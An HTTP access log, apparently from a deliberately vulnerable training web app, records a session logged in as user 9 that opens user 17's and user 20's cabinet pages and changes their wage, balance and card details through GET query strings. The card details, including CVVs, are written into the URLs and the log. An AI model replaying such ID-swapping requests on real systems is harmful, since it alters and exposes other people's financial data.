X-Forwarded-For: 45.85.105.205
Via: 2.0 Caddy
Sec-Fetch-Dest: script
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
If-Modified-Since: Sun, 25 Jan 2026 11:28:38 GMT
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46934
Path: /static/defect_detail.js
URL: /static/defect_detail.js
Method: GET
[2026-03-11 17:27:36] === HTTP Request ===
[2026-03-11 17:27:36] Defect detail page accessed - defect_id: b78f03e5-4524-4cb6-b982-feebf83e3cbe, IP: 172.30.0.12:46934
===================
Via: 2.0 Caddy
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept: */*
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Priority: u=1, i
Cookie: auth=sess_1773233005829118282; user_id=9
Sec-Fetch-Site: same-origin
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/defects
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46934
Path: /defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
URL: /defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
Method: GET
[2026-03-11 17:27:36] === HTTP Request ===
[2026-03-11 17:27:34] Defects page accessed - IP: 172.30.0.12:46934
===================
Sec-Fetch-Dest: empty
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Priority: u=1, i
Cookie: auth=sess_1773233005829118282; user_id=9
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46934
Path: /defects
URL: /defects
Method: GET
[2026-03-11 17:27:34] === HTTP Request ===
[2026-03-11 17:27:33] Main page accessed - IP: 172.30.0.12:46934
===================
X-Forwarded-Proto: https
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 45.85.105.205
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Cookie: auth=sess_1773233005829118282; user_id=9
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/cabinet?user=20
Accept-Encoding: gzip, deflate, br, zstd
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46934
Path: /
URL: /
Method: GET
[2026-03-11 17:27:33] === HTTP Request ===
[2026-03-11 17:26:43] Update Financial Info - user_id: 20, wage: 0.00, total: 0.00
===================
Sec-Fetch-Dest: empty
Referer: https://admin.vulnberries.ru/cabinet?user=20
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-Proto: https
X-Forwarded-For: 45.85.105.205
Sec-Ch-Ua-Mobile: ?0
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Cookie: auth=sess_1773233005829118282; user_id=9
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Priority: u=1, i
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Platform: "macOS"
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46934
Query: user_id=20&wage=0.00&total=0.00
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=20&wage=0.00&total=0.00
Method: GET
[2026-03-11 17:26:43] === HTTP Request ===
[2026-03-11 17:26:39] Cabinet page accessed - user_id: 20, IP: 172.30.0.12:46934
===================
Priority: u=1, i
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Proto: https
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Mode: cors
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Ch-Ua-Mobile: ?0
Cookie: auth=sess_1773233005829118282; user_id=9
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/login
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46934
Query: user=20
Path: /cabinet
URL: /cabinet?user=20
Method: GET
[2026-03-11 17:26:39] === HTTP Request ===
[2026-03-11 17:26:33] Login page accessed - IP: 172.30.0.12:46934
===================
Upgrade-Insecure-Requests: 1
Sec-Fetch-Mode: navigate
Referer: https://admin.vulnberries.ru/cabinet?user=17
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 45.85.105.205
Via: 2.0 Caddy
Sec-Fetch-Dest: document
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Cookie: auth=sess_1773233005829118282; user_id=9
X-Forwarded-Proto: https
Sec-Fetch-User: ?1
Priority: u=0, i
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46934
Path: /login
URL: /login
Method: GET
[2026-03-11 17:26:33] === HTTP Request ===
[2026-03-11 17:25:17] Update Financial Info - user_id: 17, card_number: 213124, card_holder: 214, expiry_date: 22/25, cvv: 455
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-For: 45.85.105.205
Sec-Ch-Ua-Platform: "macOS"
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/cabinet?user=17
Sec-Ch-Ua-Mobile: ?0
Cookie: auth=sess_1773233005829118282; user_id=9
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46934
Query: user_id=17&card_number=213124&card_holder=214&expiry_date=22%2F25&cvv=455
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=213124&card_holder=214&expiry_date=22%2F25&cvv=455
Method: GET
[2026-03-11 17:25:17] === HTTP Request ===
[2026-03-11 17:24:37] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
Sec-Fetch-Mode: cors
Cookie: auth=sess_1773233005829118282; user_id=9
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Priority: u=1, i
Accept: */*
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Mobile: ?0
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-Proto: https
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/cabinet?user=17
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46934
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-11 17:24:37] === HTTP Request ===
[2026-03-11 17:21:21] Update Financial Info - user_id: 17, card_number: 5748 8288 2100 0245, card_holder: Ivan Petrov, expiry_date: 11/30, cvv: 154
===================
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/cabinet?user=17
Priority: u=1, i
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept: */*
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Cookie: auth=sess_1773233005829118282; user_id=9
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.205
Authorization: Bearer Bearer eyJhbGciOiJIU...
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:35178
Query: user_id=17&card_number=5748+8288+2100+0245&card_holder=Ivan+Petrov&expiry_date=11%2F30&cvv=154
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=5748+8288+2100+0245&card_holder=Ivan+Petrov&expiry_date=11%2F30&cvv=154
Method: GET
[2026-03-11 17:21:21] === HTTP Request ===
[2026-03-11 17:20:32] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Cookie: auth=sess_1773233005829118282; user_id=9
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Sec-Fetch-Site: same-origin
Referer: https://admin.vulnberries.ru/cabinet?user=17
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 45.85.105.205
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept-Encoding: gzip, deflate, br, zstd
Via: 2.0 Caddy
Sec-Ch-Ua-Mobile: ?0
Priority: u=1, i
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:35178
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-11 17:20:32] === HTTP Request ===
[2026-03-11 17:20:07] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Priority: u=1, i
Cookie: auth=sess_1773233005829118282; user_id=9
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept: */*
X-Forwarded-For: 45.85.105.205
Via: 2.0 Caddy
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/cabinet?user=17
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:35178
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-11 17:20:07] === HTTP Request ===
[2026-03-11 17:19:46] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Cookie: auth=sess_1773233005829118282; user_id=9
Accept: */*
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-For: 45.85.105.205
Via: 2.0 Caddy
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/cabinet?user=17
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:35178
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-11 17:19:46] === HTTP Request ===
[2026-03-11 17:19:02] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
Sec-Fetch-Site: same-origin
Referer: https://admin.vulnberries.ru/cabinet?user=17
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Proto: https
Sec-Ch-Ua-Platform: "macOS"
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 2.0 Caddy
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Cookie: auth=sess_1773233005829118282; user_id=9
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:35178
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-11 17:19:02] === HTTP Request ===
[2026-03-11 17:19:00] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:35178
===================
Priority: u=0, i
Cookie: auth=sess_1773233005829118282; user_id=9
Sec-Fetch-User: ?1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-Proto: https
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 45.85.105.205
Via: 2.0 Caddy
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:35178
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-11 17:19:00] === HTTP Request ===
[2026-03-11 17:18:56] Update Financial Info - user_id: 17, card_number: 123124154215215, card_holder: 23, expiry_date: 2333, cvv: 32
===================
Cookie: auth=sess_1773233005829118282; user_id=9
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/cabinet?user=17
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Site: same-origin
Priority: u=1, i
Via: 2.0 Caddy
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-Proto: https
Sec-Fetch-Dest: empty
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:35178
Query: user_id=17&card_number=123124154215215&card_holder=23&expiry_date=2333&cvv=32
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=123124154215215&card_holder=23&expiry_date=2333&cvv=32
Method: GET
[2026-03-11 17:18:56] === HTTP Request ===
[2026-03-11 17:18:56] Update Financial Info - user_id: 17, card_number: 123124154215215, card_holder: 23, expiry_date: 2333, cvv: 32
===================
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Referer: https://admin.vulnberries.ru/cabinet?user=17
Priority: u=1, i
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Cookie: auth=sess_1773233005829118282; user_id=9
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:35178
Query: user_id=17&card_number=123124154215215&card_holder=23&expiry_date=2333&cvv=32
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=123124154215215&card_holder=23&expiry_date=2333&cvv=32
Method: GET
[2026-03-11 17:18:56] === HTTP Request ===
[2026-03-11 17:16:48] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
Sec-Fetch-Mode: cors
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 45.85.105.205
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/cabinet?user=17
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
Sec-Fetch-Dest: empty
Accept: */*
Via: 2.0 Caddy
Priority: u=1, i
Cookie: auth=sess_1773233005829118282; user_id=9
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44358
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-11 17:16:48] === HTTP Request ===
[2026-03-11 17:16:48] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Priority: u=1, i
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/cabinet?user=17
Cookie: auth=sess_1773233005829118282; user_id=9
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Accept: */*
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44358
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-11 17:16:48] === HTTP Request ===
[2026-03-11 17:13:22] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Mobile: ?0
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Via: 2.0 Caddy
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/cabinet?user=17
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Priority: u=1, i
Cookie: auth=sess_1773233005829118282; user_id=9
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
Sec-Fetch-Mode: cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37460
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-11 17:13:22] === HTTP Request ===
[2026-03-11 17:13:22] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
Accept: */*
X-Forwarded-Proto: https
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Cookie: auth=sess_1773233005829118282; user_id=9
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Mode: cors
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Priority: u=1, i
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Referer: https://admin.vulnberries.ru/cabinet?user=17
Accept-Encoding: gzip, deflate, br, zstd
Via: 2.0 Caddy
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37460
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-11 17:13:22] === HTTP Request ===
[2026-03-11 17:09:04] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:45114
===================
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/cabinet?user=17
Accept: */*
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Priority: u=1, i
Cookie: auth=sess_1773233005829118282; user_id=9
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Proto: https
X-Forwarded-For: 45.85.105.205
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45114
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-11 17:09:04] === HTTP Request ===
[2026-03-11 17:09:04] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:45114
===================
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Mobile: ?0
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept-Encoding: gzip, deflate, br, zstd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.205
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/
Priority: u=0, i
X-Forwarded-Proto: https
Sec-Fetch-Dest: document
Cookie: auth=sess_1773233005829118282; user_id=9
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45114
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-11 17:09:04] === HTTP Request ===
[2026-03-11 17:09:04] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:45114
===================
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/
Accept: */*
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Mobile: ?0
Cookie: auth=sess_1773233005829118282; user_id=9
Sec-Fetch-Dest: empty
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
